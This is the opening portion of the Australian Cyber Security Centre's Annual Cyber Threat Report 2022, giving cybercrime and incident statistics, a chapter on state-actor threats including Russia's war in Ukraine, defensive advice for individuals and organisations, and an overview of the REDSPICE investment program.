Australia Annual Cyber Threat Report 2022


July 2021 – June 2022

Annual Cyber Threat Report




About the ACSC


The Australian Cyber Security Centre (ACSC), within the Australian Signals Directorate (ASD), leads the Australian
Government’s cyber security activities. The ACSC brings together capabilities to improve the cyber resilience of the
Australian community and help make Australia the most secure place to connect online. The ACSC’s services include:

■ the Australian Cyber Security Hotline, which is contactable 24 hours a day, 7 days a week, via
1300 CYBER1 (1300 292 371)
■ publishing Alerts, technical advice, Advisories and notifications on significant cyber security threats
■ cyber threat monitoring and intelligence sharing with our partners in Australia and overseas to counter cyber
security threats
■ Joint Cyber Security Centres (JCSCs) that support collaboration between over 80,000 Australian organisations and
individuals on cyber security issues
■ exercises and uplift activities to enhance the cyber security resilience of Australian organisations.

The ACSC acknowledges the contributions from Australian, state and territory government agencies and industry
organisations in developing this report.



Foreword
I am pleased to present the third Annual Cyber Threat Report by the Australian Cyber Security Centre (ACSC), a key
part of the Australian Signals Directorate (ASD).

Throughout its 75 year history, ASD has defended Australia from global threats and advanced our national interests.
It remains at the frontline of defending our nation and keeping Australia safe and secure.

We are currently witnessing deteriorating strategic circumstances in our region and globally, including a military
build-up unseen since World War II, and expanding cyber and grey zone capabilities are of particular concern. In this
environment, the work performed by ASD and its ACSC is more important than ever.

This expanded Annual Cyber Threat Report 2021–22 is the product of insights from across the Commonwealth, with the
Australian Federal Police, the Australian Criminal Intelligence Commission, the Australian Security Intelligence
Organisation, Defence Intelligence Organisation and the Department of Home Affairs also contributing to help all
Australians better understand the cyber threat environment and improve their cyber defences.

Over the last financial year and reflecting strategic competition globally, we have all witnessed a heightened level
of malicious cyber activity. Regrettably, too many Australians have also felt its impacts.

The government considers cyber security and reinforcing our online resilience to be a national priority. Increased
investment in ASD’s cyber and intelligence capabilities under project REDSPICE (Resilience, Effects, Defence, SPace,
Intelligence, Cyber, Enablers) positions Australia to lift our defences and recognises the critical role ASD plays in
our national security.

This report maps how threat actors across the world have continued to find innovative ways to deploy online attacks,
with supply chains used to penetrate cyber defences of governments and organisations in many countries, including
Australia.

The better news is that with increased collaboration across industry, small business, and government—and with all
Australians—our joint cybersecurity future and the digital opportunities before us remain bright.

In many ways, this report is the product of all Australians with its foundations and findings formed by reports to the
ACSC. Reporting cybercrime is vital for us to build a threat picture that can prevent others from falling victim to the
ransomware syndicates and cybercriminals. The best cyber defence is informed by the best intelligence.

Together we can reach our ambitious goal to make Australia truly the most secure place to connect online. This report
is another important step forward.

The Hon Richard Marles, MP


Deputy Prime Minister and Minister for Defence

ACSC Annual Cyber Threat Report 2022

Table of Contents
About the Contributors 8
Executive Summary 11
What the ACSC saw 12
What the ACSC did 14
What should individuals do? 18
What should organisations do? 19

Cybercrime and cyber security incident statistics 20


Cybercrime and cyber security incident statistics 21
The cost of cybercrime 21
Frequency of cybercrime reports 21
Cybercrime reports by state and territory 22
Cybercrime by type 23
Cyber security incident severity 26
Cyber security incidents by sector 27

State actors 28
Gaining a foothold to steal our secrets 29
Cyber operations as a geostrategic tool 30
Cyber operations in military conflict 30
Cyber risks to Australian networks 31
What the ACSC is doing 31
Russian state-sponsored cyber actors 33
How to protect yourself from state actors 33

REDSPICE 34

Cybercrime 36
Proliferation of threats 37
Cybercrime-as-a-Service 38
Business Email Compromise 40
How to protect yourself from cybercrime 43



Ransomware 44
Ransomware targeting 45
Ransomware tactics 45
Ransomware-as-a-Service 45
Ransomware trends 47
Data breaches 48
ACSC advice on payment of ransom demands 50
Cost to victims of ransomware 50
Ransomware Action Plan 51
How to protect yourself from ransomware 51

Critical infrastructure 52
Current critical infrastructure threat 53
Critical infrastructure trends 54
Ransomware and critical infrastructure 55
Advice and support for critical infrastructure organisations 56

Critical vulnerabilities 58
Vulnerabilities being targeted faster and by more actors 59
Comparative critical vulnerabilities timelines 60
Log4j 62
Patching and uplifting networks 63

Cyber defence and resilience 64


Interconnectivity brings risks and opportunities 65
What is the ACSC doing? 67
Uplifting an interconnected Australian economy 69
What can my organisation do? 70
What can individuals do? 71
Notes 73
Sources 73
Glossary 73
Feedback 73


About the Contributors

Australian Signals Directorate


ASD’s purpose is to defend Australia from global threats and help advance
Australia’s national interests. It does this by mastering technology to inform,
protect and disrupt.

ASD delivers intelligence, cyber security and offensive operations in support of
the Australian Government and the Australian Defence Force.

Australian Criminal Intelligence Commission


The Australian Criminal Intelligence Commission (ACIC), as Australia’s national
criminal intelligence agency, works with law enforcement partners to improve the
nation’s ability to respond to crime.

The ACIC contributes to the cybercrime intelligence function within the ACSC. Its
role in the ACSC is to provide cybercrime-related criminal intelligence insights by
working closely with law enforcement, intelligence and industry security partners
in Australia and internationally.

Australian Federal Police


The Australian Federal Police (AFP) is responsible for enforcing Commonwealth
criminal law; contributing to combating complex transnational, serious,
and organised crime impacting Australia’s national security; and protecting
Commonwealth interests from criminal activity in Australia and overseas. The
AFP’s cybercrime teams within the ACSC enable the AFP to collaborate with
other ACSC partners, triage new referrals, undertake targeted intelligence
development and coordinate law enforcement responses to cybercrimes
of national significance. The AFP also leads the Joint Policing Cybercrime
Coordination Centre to harness the powers, experiences and investigative
capabilities of Australian policing jurisdictions.

Australian Security Intelligence Organisation


The Australian Security Intelligence Organisation (ASIO) is Australia’s security
intelligence service. It protects Australia and Australians from threats to their
security, including terrorism, espionage, and interference in Australia’s affairs
by foreign governments. ASIO’s cyber program is focused on investigating and
assessing the threat to Australia from malicious state-sponsored cyber activity.
ASIO’s contribution to the ACSC includes intelligence collection, investigations
and intelligence-led outreach to business and government partners.



Defence Intelligence Organisation


The Defence Intelligence Organisation co-leads the ACSC’s Cyber Threat
Assessment team in partnership with ASD to provide the Australian Government
with an all-source, strategic, cyber threat intelligence assessment capability.

Department of Home Affairs


The Department of Home Affairs leads cyber security policy for the Australian
Government, including developing Australia’s Cyber Security Strategy 2020 and
overseeing its implementation.

Home Affairs Cyber and Infrastructure Security Outreach officers are co-located
in the JCSCs. Outreach officers work with small and medium businesses, with a
particular focus on critical infrastructure entities, or those entities that sit within
the critical infrastructure supply chain, providing them with advice on where to
access information to uplift their cyber security and resilience.



Executive Summary
Over the 2021–22 financial year, the deterioration of the global threat environment was reflected in cyberspace.
This was most prominent in Russia’s invasion of Ukraine, where destructive malware resulted in significant damage in
Ukraine itself, but also caused collateral damage to European networks and increased the risk to networks worldwide.

In Australia, we also saw an increase in the number and sophistication of cyber threats, making crimes like extortion,
espionage, and fraud easier to replicate at a greater scale. The ACSC received over 76,000 cybercrime reports, an
increase of nearly 13 per cent from the previous financial year. This equates to one report every 7 minutes, compared
to every 8 minutes last financial year.

The ACSC identified the following key cyber security trends in the 2021–22 financial year:

■ Cyberspace has become a battleground. Cyber is increasingly the domain of warfare, as seen in Russia’s use of
malware designed to destroy data and prevent computers from booting in Ukraine. But Russia was not alone in its use
of cyber operations to pursue strategic interests. In July 2021, the Australian Government publicly attributed
exploitation of Microsoft Exchange vulnerabilities to China’s Ministry of State Security. And a joint Five-Eyes
Advisory in November 2021 confirmed exploitation of these vulnerabilities by an Iranian state actor. Regional
dynamics in the Indo-Pacific are increasing the risk of crisis and cyber operations are likely to be used by states
to challenge the sovereignty of others.
■ Australia’s prosperity is attractive to cybercriminals. According to a 2021 Credit Suisse report, Australia has the
highest median wealth per adult in the world. In 2021–22, cybercrimes directed at individuals, such as online banking
and shopping compromise, remained among the most common, while Business Email Compromise (BEC) trended towards
targeting high value transactions like property settlements.
■ Ransomware remains the most destructive cybercrime. Ransomware groups have further evolved their business model,
seeking to maximise their impact by targeting the reputation of Australian organisations. In 2021–22, ransomware
groups stole and released the personal information of hundreds of thousands of Australians as part of their extortion
tactics. The cost of ransomware extends beyond the ransom demands, and may include system reconstruction, lost
productivity, and lost customers.
■ Worldwide, critical infrastructure networks are increasingly targeted. Both state actors and cybercriminals view
critical infrastructure as an attractive target. The continued targeting of Australia’s critical infrastructure is of
concern as successful attacks could put access to essential services at risk. Potential disruptions to Australian
essential services in 2021–22 were averted by effective cyber defences, including network segregation and effective,
collaborative incident response.
■ The rapid exploitation of critical public vulnerabilities became the norm. Australian organisations, and even
individuals, were indiscriminately targeted by malicious cyber actors. Malicious actors persistently scanned for any
network with unpatched systems, sometimes seeking to use these as entry points for higher value targets. The majority
of significant incidents ACSC responded to in 2021–22 were due to inadequate patching.

In the face of rising threats to the digital-dependent Australian economy, cyber defence must be a priority for all
Australians. The most effective means of defending against cyber threats continues to be the implementation of the
Essential Eight cyber security strategies. To support this, the ACSC launched several new initiatives in 2021–22 to
improve Australia’s cyber resilience, such as a Cyber Threat Intelligence Sharing (CTIS) platform which automates
sharing of indicators of compromise. The Australian Government’s ten year investment in ASD, known as REDSPICE, will
further harden Australia’s cyber defences in 2022–23 and beyond.

What the ACSC saw

■ An increase in financial losses due to BEC to over $98 million, an average loss of $64,000 per report.
■ A rise in the average cost per cybercrime report to over $39,000 for small business, $88,000 for medium business,
and over $62,000 for large business, an average increase of 14 per cent.
■ A 25 per cent increase in the number of publicly reported software vulnerabilities (Common Vulnerabilities and
Exposures – CVEs) worldwide.
■ Over 76,000 cybercrime reports, an increase of 13 per cent from the previous financial year.
■ A cybercrime report every 7 minutes on average, compared to every 8 minutes last financial year.
■ Over 25,000 calls to the Cyber Security Hotline, an average of 69 per day and an increase of 15 per cent from the
previous financial year.
■ 150,000 to 200,000 Small Office/Home Office routers in Australian homes and small businesses vulnerable to
compromise, including by state actors.
■ Fraud, online shopping and online banking were the top reported cybercrime types, accounting for 54 per cent of all
reports.


What the ACSC did

■ Responded to over 1,100 cyber security incidents.
■ Blocked over 24 million malicious domain requests through the Australian Protective Domain Name System.
■ Took down over 29,000 brute force attacks against Australian servers through the Domain Takedown Service.
■ Took down over 15,000 domains hosting malicious software targeting Australia’s COVID-19 vaccine rollout.
■ Shared over 28,000 indicators of compromise with ACSC Partners through the Cyber Threat Intelligence Sharing
platform.
■ Collaborated with partners on 5 successful operations against criminal online marketplaces and foreign scam
networks.
■ Responded to 135 ransomware incidents, an increase of over 75 per cent compared to 2019–20.
■ Notified 148 entities of ransomware activity on their networks.
■ Conducted 49 high priority operational tasks in response to identified and potential significant cyber threats,
including scanning for vulnerable Australian devices.
■ Published 49 Alerts and 14 Advisories on cyber.gov.au, which collectively saw more than 393,000 visits.
■ Issued an Advisory urging Australian organisations to adopt an enhanced security posture following Russia’s
invasion of Ukraine, which was updated 10 times and received more than 57,000 views, plus a potential reach of almost
1 million people through social media.
■ Briefed more than 200 government, business and critical infrastructure organisations on the risk of collateral
damage to Australian networks following the Russian invasion of Ukraine.
■ Published 13 new Step-by-Step Guides to help Australian individuals and small businesses to implement simple cyber
security practices.
■ Expanded the Partnership Program to over 2,300 network partners, 3,400 business partners, and over 82,000 home
partners.
■ Led 24 cyber security exercises involving over 280 organisations to strengthen Australia’s cyber resilience.
■ Operationalised amendments to the Security of Critical Infrastructure Act, including through new incident
categorisation thresholds and changes to the ReportCyber website.
■ Notified 5 critical infrastructure entities of malicious cyber activity and vulnerabilities potentially impacting
their networks since the implementation of amendments to the Security of Critical Infrastructure Act.
■ Completed the Critical Infrastructure Uplift Program (CI-UP) pilot and rolled out activities and tools open to all
critical infrastructure partners.


What should individuals do?

Follow the ACSC’s easy steps to secure your devices and accounts, including:

■ Update your devices and replace old devices that do not receive updates.
■ Activate multi-factor authentication.
■ Regularly back up your devices.
■ Set secure passphrases.
■ Watch out for scams.
■ Sign up to the ACSC’s free Alert Service.
■ Report cybercrime to the ACSC at cyber.gov.au.



What should organisations do?

■ For larger organisations: implement the ACSC’s Essential Eight mitigation strategies, Strategies to Mitigate Cyber
Security Incidents and the Information Security Manual.
■ For smaller organisations: follow the ACSC’s advice for ransomware, Business Email Compromise and other threats.
■ Review the cyber security posture of remote workers and their use of communication, collaboration and business
productivity software.
■ Patch vulnerabilities within 48 hours. If you cannot achieve this, consider using a cloud service provider or
managed service provider (MSP) that can.
■ Only use reputable cloud service providers and managed service providers that implement appropriate cyber security
measures.
■ Sign up to become an ACSC partner to receive insights, advisories and advice.
■ Test your cyber security detection, incident response, business continuity and disaster recovery plans.
■ Report all cybercrime and cyber security incidents to the ACSC via ReportCyber.

Chapter 1

Cybercrime and cyber security incident statistics

■ Cyber security incidents responded to by the ACSC are growing in severity.
■ Cybercrime has a significant impact on organisations of all sizes; in 2021–22 the average loss per report across
businesses increased 14 per cent compared to 2020–21.
■ Cybercrime and cyber security incidents remain underreported and the ACSC urges Australian organisations and
individuals to report all cybercrimes and cyber security incidents.
Cybercrime and cyber security incident statistics

A cybercrime is an offence committed through or against information and communications technology (ICT).
Cybercrimes are either cyber enabled (using ICT to facilitate offences such as fraud or sexual exploitation) or cyber
dependent (crimes which can only be committed via ICT, such as the use of ransomware or other malware).

A cyber security incident is an event, or series of events, that has a significant probability of compromising an
organisation’s operations. Not all cybercrimes lead to cyber security incidents, and the following statistics are from
2 distinct datasets: cybercrimes reported to ReportCyber, and cyber security incidents to which the ACSC responded.

The cost of cybercrime

As the volume of cybercrime increases, cybercriminal methodology evolves, and digital transactions blur national
borders, it is becoming increasingly difficult to accurately estimate the total cost of cybercrime.

Cybercrime can cause financial and reputational damage, disrupt business and essential services, and result in
permanent damage to an organisation. Self-reported financial loss data as submitted to ReportCyber only captures a
small portion of the total financial impact of cybercrime. It does not capture the cost to the customers of victims,
nor the capital and recurring costs of cyber security incident remediation.

Frequency of cybercrime reports

During the 2021–22 financial year, over 76,000 cybercrime reports were made via ReportCyber, an increase of nearly
13 per cent from the previous financial year. One cybercrime report is made approximately every 7 minutes, compared to
one report every 8 minutes in 2020–21.

[Figure 1 is a line chart of monthly cybercrime reports (vertical axis 3,000 to 8,000), July through June, comparing
the series labelled "June 20 - July 21" and "June 21 - July 22".]

Figure 1: Cybercrime reports by month for 2021–22 financial year compared with 2020–21 financial year


Cybercrime reports by state and territory


Australia’s more populous states continue to report more cybercrime. Queensland and Victoria report disproportionately
higher rates of cybercrime relative to their populations. However, the highest average reported losses were by victims in
the Northern Territory (over $40,000 per cybercrime report where a financial loss occurred) and Western Australia
(over $29,000).

[Figure 2 is a map of Australia showing the percentage of cybercrime reports assigned to each state and territory.]

Figure 2: Breakdown of cybercrime reports by assigned jurisdiction for financial year 2021–22
Note: Assigned jurisdiction is the state or territory law enforcement agency assigned to each ReportCyber report. This may differ
from the physical location of the victim.


Cybercrime by type
The most frequently reported cybercrimes were all cyber enabled crimes:

■ online fraud: approximately 27 per cent
■ online shopping: approximately 14 per cent
■ online banking: approximately 13 per cent.

Cyber dependent crimes, such as ransomware, were a very small percentage of total cybercrime reports. Nevertheless,
the ACSC assesses that ransomware remains the most destructive cybercrime threat. This is because ransomware has a
dual impact on victim organisations—their business is disrupted by the encryption of data, but they also face reputational
damage if stolen data is released or sold on. The public are also impacted by disruptions and data breaches resulting
from ransomware.

Cybercrime type     Share of reports
Fraud               26.90%
Shopping            14.40%
Online Banking      12.60%
Investment          12.20%
BEC                  6.12%
Selling              4.36%
Bulk Extortion       3.93%
Romance              3.01%
Threat               2.64%
Harassment           2.60%
Bullying             2.58%
Malware              2.22%
Image Shared         1.94%
ID Theft             1.79%
Stalking             1.75%
Ransomware           0.59%
Other                0.37%

Figure 3: Cybercrime reports by type for financial year 2021–22


Cybercrime loss by organisation size


Medium-sized businesses (defined by Australian Bureau of Statistics as between 20 and 199 employees) had the highest
average loss per cybercrime report where a financial loss occurred.

This may be because they were less likely than large organisations to apply cyber security mitigations as outlined in the
ACSC’s Strategies to Mitigate Cyber Security Incidents. These strategies decrease the likelihood and impact of cyber
incidents. In addition, medium-sized organisations may be more likely to report cybercrime to ReportCyber, as they are less
likely than larger organisations to have sufficient in-house or commercial incident response capabilities. The ACSC urges
organisations to report all cybercrime, irrespective of the financial loss incurred, as it helps to better understand and defend
against the threat.

Organisation size   Average reported loss per report (where a loss occurred)
Small Business      $39,555
Medium Business     $88,407
Large Business      $62,233

Figure 4: Cybercrime reports and average reported loss by organisation size for financial year 2021–22
Note: The 2021 Annual Cyber Threat Report averaged financial loss across all cybercrime reports. This year’s Report averages only
those cybercrime reports where financial loss occurred. The ACSC assesses that excluding reports where no financial loss occurred
provides more accurate and actionable data for businesses.


Calls to the ACSC


The number of calls to 1300 CYBER1 has continued to increase. The ACSC received more than 25,000 calls in the 2021–22
financial year, an average of 69 calls per day. This is a 15 per cent increase on the 2020–21 financial year and over a four-fold
increase from the 2019–20 financial year, when the ACSC received 5,300 calls.

[Figure 5 is a line chart of monthly Hotline call volumes (vertical axis 0 to 3,000), July through June, comparing
financial year 20–21 with financial year 21–22.]

Figure 5: Call volumes for financial year 2021–22 compared with financial year 2020–21


Cyber security incidents


During the 2021–22 financial year, the ACSC responded to over 1,100 cyber security incidents, an average of 21 cyber security
incidents per week. Compared to the 2020–21 financial year, this is a decrease of 36 per cent. This does not mean that
the cyber security threat to Australian organisations has decreased, especially as the number of cybercrime reports has
increased. The expansion of Australia’s commercial incident response sector means incidents which may have previously
required an ACSC response may now be being handled by in-house or contracted incident response teams.

Cyber security incident severity


The ACSC categorises each incident it responds to on a scale of Category 1, the most severe, to Category 6, the least severe.
Incidents are categorised on severity of effect, extent of compromise, and significance of the organisation.

The number and severity of cyber security incidents in the 2021–22 financial year is not directly comparable with
previous financial years, as the ACSC introduced a new incident categorisation scale in March 2022. This was due to the
introduction of mandatory incident reporting for Regulated Critical Infrastructure under amendments to the Security of
Critical Infrastructure Act 2018 (SoCI Act). Changes included simplifying the scale, prioritising incidents related to Critical
Infrastructure and Systems of National Significance networks and refining definitions of cyber effects and impacts.

The severity of cyber security incidents is increasing. Nearly 15 per cent of incidents in the 2021–22 financial year were
categorised as C3, up from approximately 6 per cent in the previous financial year. This is partly attributable to the category
changes, but also to an increase in attacks by cybercriminals on larger organisations and an increased impact on victims.
Attacks included the exfiltration of sensitive data and the movement by malicious actors across multiple segments of
affected networks.

Figure 6 is a matrix: each row is a severity of effect, each column is a class of affected organisation, and each
cell gives the incident category (C1 most severe to C6 least severe) together with the number of 2021–22 incidents
that fell into that cell. Columns, left to right:

(1) Member(s) of the public; Sole traders
(2) Small organisations; Schools; Local Government
(3) Medium-sized organisations; Academia/R&D; Large organisations; Supply chain
(4) State Government; Government shared services; Regulated critical infrastructure
(5) Federal Government
(6) National security; Systems of national significance

Severity of effect                                   (1)  (2)  (3)  (4)  (5)  (6)   Incident counts shown in row
Sustained disruption of essential systems
  and associated services                            C6   C5   C4   C3   C1   C1    1
Extensive compromise                                 C6   C5   C4   C3   C2   C1    1, 14, 28, 2
Isolated compromise                                  C6   C5   C5   C3   C3   C2    4, 28, 72, 75, 26
Coordinated low-level malicious attack               C6   C6   C5   C4   C3   C3    15, 40, 33
Low-level malicious attack                           C6   C6   C5   C4   C4   C3    4, 116, 146, 137, 64
Unsuccessful low-level malicious attack              C6   C6   C6   C6   C6   C6    1, 29, 35, 62, 152, 35

Incident counts are listed in the left-to-right order in which they appear in the figure; cells with no incidents are
not shown, so a row with fewer than six counts does not indicate which columns were empty.

Figure 6: Cyber security incidents by incident category for financial year 2021–22


Cyber security incidents by sector


Excluding government sectors—which have some additional reporting obligations—the health care and social assistance
sectors reported the highest number of cyber security incidents during the 2021–22 financial year. Compared to the 2020–21
financial year, the retail sector dropped out of the top 10, replaced by the electricity, gas, water and waste service sector.

The top 10 reporting sectors accounted for approximately 75 per cent of all incidents for the 2021–22 financial year. As such,
these sectors are a focus for ACSC partnership and outreach activities.

Sector                                              Share of incidents
Government – Commonwealth                           24%
Government – State/Territory/Local                  10%
Health Care and Social Assistance                    9%
Information Media and Telecommunications             8%
Education and Training                               7%
Professional, Scientific and Technical Services      7%
Construction                                         4%
Manufacturing                                        4%
Financial and Insurance Services                     4%
Electricity, Gas, Water and Waste Services           3%

Figure 7: Cyber security incidents to which the ACSC responded in financial year 2021–22, top 10 industry sectors
Note: The reporting frequency of government agencies is in part due to their obligations to report significant cyber security incidents
to the ACSC, and may not necessarily reflect a greater susceptibility to cyber security incidents.

Chapter 2

State actors

■ Russia’s invasion of Ukraine has increased the cyber threat globally.
■ Malicious state actors continue to seek sensitive information, including by targeting Australian small businesses
and individuals.
■ Most compromises identified by the ACSC used relatively simple tradecraft which could have been prevented by
enhanced cyber security.

Gaining a foothold to steal our secrets

In 2021–22, state actors continued to engage in malicious cyber operations as an efficient method of political and
economic espionage. State actors seek sensitive information—including personally identifiable information (PII)—to
support their government’s intelligence requirements. But these actors do not just want classified information. They
also want to understand who we are, how we connect with each other, and what values we hold. Furthermore, in some
cases, they may seek to pre-position in strategic networks to prepare for coercive or disruptive activity against us.

Over the past financial year, Australia continued to be the target of persistent cyber espionage by a wide range of
state actors due to its regional and global interests, international partnerships and participation in multilateral
forums. This cyber espionage is often conducted or directed by foreign intelligence services seeking information from
public and private networks across Australia, including political, diplomatic, military, technological and commercial
data, as well as personal data from individual Australians.

The ACSC collaborated with Australian, state and territory government agencies to ensure events such as the Census
and state and federal elections were resilient to malicious cyber activity by state or criminal actors.

Case Study: ACSC support to the Census


The Australian Bureau of Statistics (ABS) ran the Census in August 2021. ABS systems are an attractive target for malicious
actors, including state actors, as they hold personal information about Australians.

The ABS was particularly concerned with maintaining the availability of the Census systems, the confidentiality of
Australians’ information, and the integrity and utility of the collected data. The ACSC provided a range of services to the ABS
to assess and improve the cyber security of its systems.

Prior to the Census, the ACSC provided ABS with threat intelligence briefings. The ACSC also employed its active cyber
defence capabilities to assess and pre-empt malicious cyber activity against the Census.

The ACSC conducted a review of ABS systems, including a source code review and penetration testing to detect cyber
security vulnerabilities, and analysis to detect if there was malicious activity already on the system. Recommendations
resulting from the review were provided to the ABS.

Throughout the Census, the ACSC monitored ABS systems to help detect and respond to threats. On Census night, the ACSC
provided on-site operational support to bolster any critical incident response.

The ACSC found no indication of malicious activity through its assessments, and critical cyber security recommendations
were resolved by the ABS prior to the Census. The Census was completed without any cyber security incident or disruption
to services.

ACSC Annual Cyber Threat Report 2022

While state actors have access to a wide range of sophisticated and bespoke capabilities, the majority of compromises the ACSC observed used relatively simple tools and techniques. These include spear phishing, targeting third-party service providers and exploiting unpatched or misconfigured systems using public vulnerabilities. The exploitation of public vulnerabilities is low cost and scalable, and exploits can be deployed within hours of a patch release or technical write up. Exploiting public vulnerabilities also avoids the need to use zero-day exploits—vulnerabilities that have not been disclosed or patched by the software vendor—allowing state actors to preserve these for use against the highest value targets.

State actors will likely continue to use simple tools and techniques to target government and business networks for as long as it remains effective, inexpensive and scalable.

Cyber operations as a geostrategic tool

The Indo-Pacific is at the centre of geostrategic competition, and cyber operations are a valuable tool in this contest. Some countries use cyber operations to gain advantage by stealing other nations’ security secrets and intellectual property at a greater scale than in the past. They can also use cyberspace to sow disinformation, interfere in economies and shape public sentiment. If necessary, states can launch cyberattacks that sabotage and destabilise their adversaries. Much of this can be done covertly, at relatively low cost and in ways that make it hard for other states to deter or respond.

Cyberspace itself has become a battleground. Some countries in our region continue to strain the norms and institutions that govern cyberspace as a global commons. These countries have increasingly cut access to the open internet and used digital tools to repress freedoms. These countries seek to export their approach and impose it on others by undermining international standards and technical protocols. Australia opposes these actions and is committed to a free and open Internet. In April 2022, Australia joined over 60 other nations in launching A Declaration for the Future of the Internet, which describes our position on the potential for digital technologies to uphold the values that promote connectivity, democracy, and the rule of law.

Cyberspace is also a joint warfighting domain, with cyber effects increasingly incorporated into military operations. Some countries are acquiring cyber capabilities which can ‘hold-at-risk’ the networks other countries rely on. To ‘hold-at-risk’ is to demonstrate the capability to overcome the defences of another country, to undermine confidence in networks and enable state actors to cripple essential services in the event of a conflict.

Cyber operations in military conflict

Russia’s invasion of Ukraine has altered the geopolitical balance in ways that could expose organisations to increased malicious cyber activity.

Ukrainian government officials have acknowledged they are fighting a dual war—one on the ground and one in the digital realm. Cyber operations have been used as a tool of war alongside a major ground offensive, with malicious cyber activity against Ukrainian networks before and during the conflict.

Ukraine has experienced an onslaught of sustained disruptive cyber activity, including distributed denial of service (DDoS) attacks. While the impact of this malicious activity has been mitigated by Ukraine’s cyber defensive measures, it still has the potential to cripple essential services and have cascading effects. In the first 6 weeks of the invasion, at least 8 variants of destructive malware were identified, including wiper malware designed to erase data and prevent computers from booting.

Against this backdrop, the integration of cyber operations into conventional war has drawn non-traditional combatants and civilian entities into the conflict. Criminal syndicates and issue-motivated groups have conducted activities in support of Russian or Ukrainian interests, independent of Russian and Ukrainian government chains of command. Issue-motivated groups have made claims of successful attacks against government and private networks, including exfiltration and posting of data on the darkweb. Such activities facilitate future potential cyberattacks by malicious state and non-state actors.

Pages 30 and 31 record a subset of the malicious cyber activity which occurred in the first 60 days of the war. Disruptive activities continue unabated, and escalating geopolitical tensions will likely see the continued use of cyber effects as a means of dissuasion, disruption, degradation or denial.

Cyber risks to Australian networks

Russia’s invasion of Ukraine demonstrated the real threat of disruptive and destructive cyber operations, including the potential for third parties to suffer collateral damage. Some Russian cyber operations impacted beyond their primary target sets. For example, a 24 February 2022 attack on a satellite communications company had spillover effects across geographic borders. In addition to causing outages across Ukraine, this attack disabled over 10,000 satellite communications terminals outside Ukraine, including terminals that supported the operation of wind turbines and internet services for private citizens.

Previous cyberattacks against Ukraine have also had international consequences—such as the NotPetya malware in 2017, which affected companies worldwide, including in Australia. Russian cyber actors may conduct malicious activity as a response to military materiel support provided by the US, UK, Australia and other partners, as well as the economic costs imposed on Russia.

Australia would be vulnerable in future regional or global conflicts to cyber operations that target the supply chains that Australian systems depend upon. This would be the case even if Australia were not directly involved. There would probably be little warning of such disruption. Australian network owners need to consider how to secure their critical systems and protect their sensitive information; for instance, through improved segmentation between their corporate and operational networks.

What the ACSC is doing

In the lead-up to the invasion, DDoS attacks targeted Ukraine’s finance sector and banks. On 20 February 2022, Australia joined the US and UK in publicly attributing these cyberattacks to the Russian General Staff Main Intelligence Directorate.

On 23 February 2022, the ACSC released an Alert and an Advisory urging Australian organisations to urgently adopt enhanced cyber security postures by prioritising the following actions:

■ patching applications and devices
■ implementing mitigations against phishing and spear phishing attacks
■ ensuring that logging and detection systems are fully updated and functioning
■ reviewing incident response and business continuity plans.

By the end of the 2021–22 financial year, the Advisory had been updated 10 times, received more than 57,000 views, and had a potential reach of more than 950,000 users through ACSC’s social media platforms.

In cooperation with our international partners from Canada, New Zealand, the UK and the US, on 21 April 2022, the ACSC released a joint Advisory specifically on Russian state and cybercriminal threats to critical infrastructure. The Advisory urges critical infrastructure network operators to prepare for and mitigate potential cyber threats by hardening their cyber defences and performing due diligence to identify indicators of compromise.

In addition, the ACSC has increased engagement with international partners to share tactics and techniques, and worked closely with industry partners to share knowledge of the threat environment. The ACSC briefed more than 200 business organisations on the risk of collateral damage to Australian networks following the Russian invasion of Ukraine, and has also provided multi-classification threat briefings to government and critical infrastructure partners.

Beyond the immediate threat presented by Russia’s invasion of Ukraine, the ACSC works to counter the risk of malicious activity by a wide range of state actors.

Malicious cyber activity in first 60 days of Russia’s invasion of Ukraine

Europe

Whole of economy
■ DDoS attack against major telecommunications provider
■ Phishing campaigns launched against European citizens

Government
■ Phishing campaign against European governments and militaries
■ Phishing campaign targeting officials helping evacuate Ukrainian refugees

Ukraine

Whole of economy
■ Ransomware attacks on Ukrainian citizens
■ DDoS causes severe outages to Media and Telecommunications sector
■ Phishing campaign targeting Ukrainian media

Government
■ Malware and DDoS attacks on Ukrainian government departments
■ Mass phishing campaign against Ukrainian government and military personnel

United States

Government
■ DDoS attack on Ukrainian embassies, including in the US

Russia

Government
■ DDoS attacks on Russian government and state-owned enterprises such as media and banks
■ Issue-motivated groups exfiltrate emails and documents from Russian entities

Russian state-sponsored cyber actors

Russian state-sponsored cyber actors have demonstrated capabilities to compromise ICT networks, develop mechanisms to maintain long-term, persistent access to ICT networks, exfiltrate sensitive data from ICT and Operational Technology (OT) networks, and disrupt critical infrastructure systems and OT functions by developing destructive malware.

Numerous Russian government and military organisations have the capability to undertake cyber operations against ICT and OT networks, including elements of:

■ The Russian Foreign Intelligence Service (SVR)
■ The Russian Federal Security Service (FSB)
■ The Russian General Staff Main Intelligence Directorate (GRU)
■ The Russian Ministry of Defence

What you should do

How to protect yourself from state actors

Individuals and organisations are not just targeted for their own data holdings; their networks can
be weaponised against others. For example, in 2021–22 personal devices and small office or home
office (SOHO) routers were used by foreign intelligence services to conduct espionage and theft
of intellectual property. Malicious actors can use these routers to conduct person-in-the-middle
compromises or as a vector to target other networks. The ACSC estimates that at least 150,000 to
200,000 devices in Australian homes and small businesses are vulnerable.

Small businesses and individuals should prioritise automated updates, which help prevent network
compromises by even the most sophisticated actors. The ACSC also provides step-by-step guides
to secure your accounts and devices at cyber.gov.au. Larger organisations should continue to
implement the Essential Eight cyber security strategies.


REDSPICE
■ The global strategic environment is deteriorating.
■ The rapidly advancing technological landscape presents great opportunities but also serious threats.
■ Cyberspace is of increasing importance to warfare and national security.

REDSPICE (Resilience, Effects, Defence, SPace, Intelligence, Cyber, Enablers) will be pivotal to addressing future cyber
threats. REDSPICE will expand the range and sophistication of ASD’s intelligence, offensive and defensive cyber capabilities,
and deliver forward-looking capabilities essential to maintaining Australia’s strategic advantage and capability edge over
the coming decade and beyond. It will:

■ help anticipate and prevent a crisis
■ block sophisticated cyberattacks against Australian critical infrastructure
■ provide offensive capabilities that equip government with retaliatory options
■ ensure Australia’s cyber and intelligence capabilities remain resilient to attack.

REDSPICE by the numbers:

■ 3X current offensive cyber capability
■ 2X persistent cyber-hunt activities
■ 4X global footprint
■ 1900 new analyst, technologist, corporate, and enabling roles across Australia and the world
■ 40% staff located outside Canberra

The REDSPICE investment will help train a new generation of cyber and intelligence experts to protect Australia from cyber adversaries.

■ Analysts: Create our edge, solve the problems others cannot.
■ Technologists: Use emerging and cutting-edge technology and big data to solve complex problems.
■ Corporate & Enabling Services: Enable our purpose.
■ Advanced AI, machine learning and cloud technology.

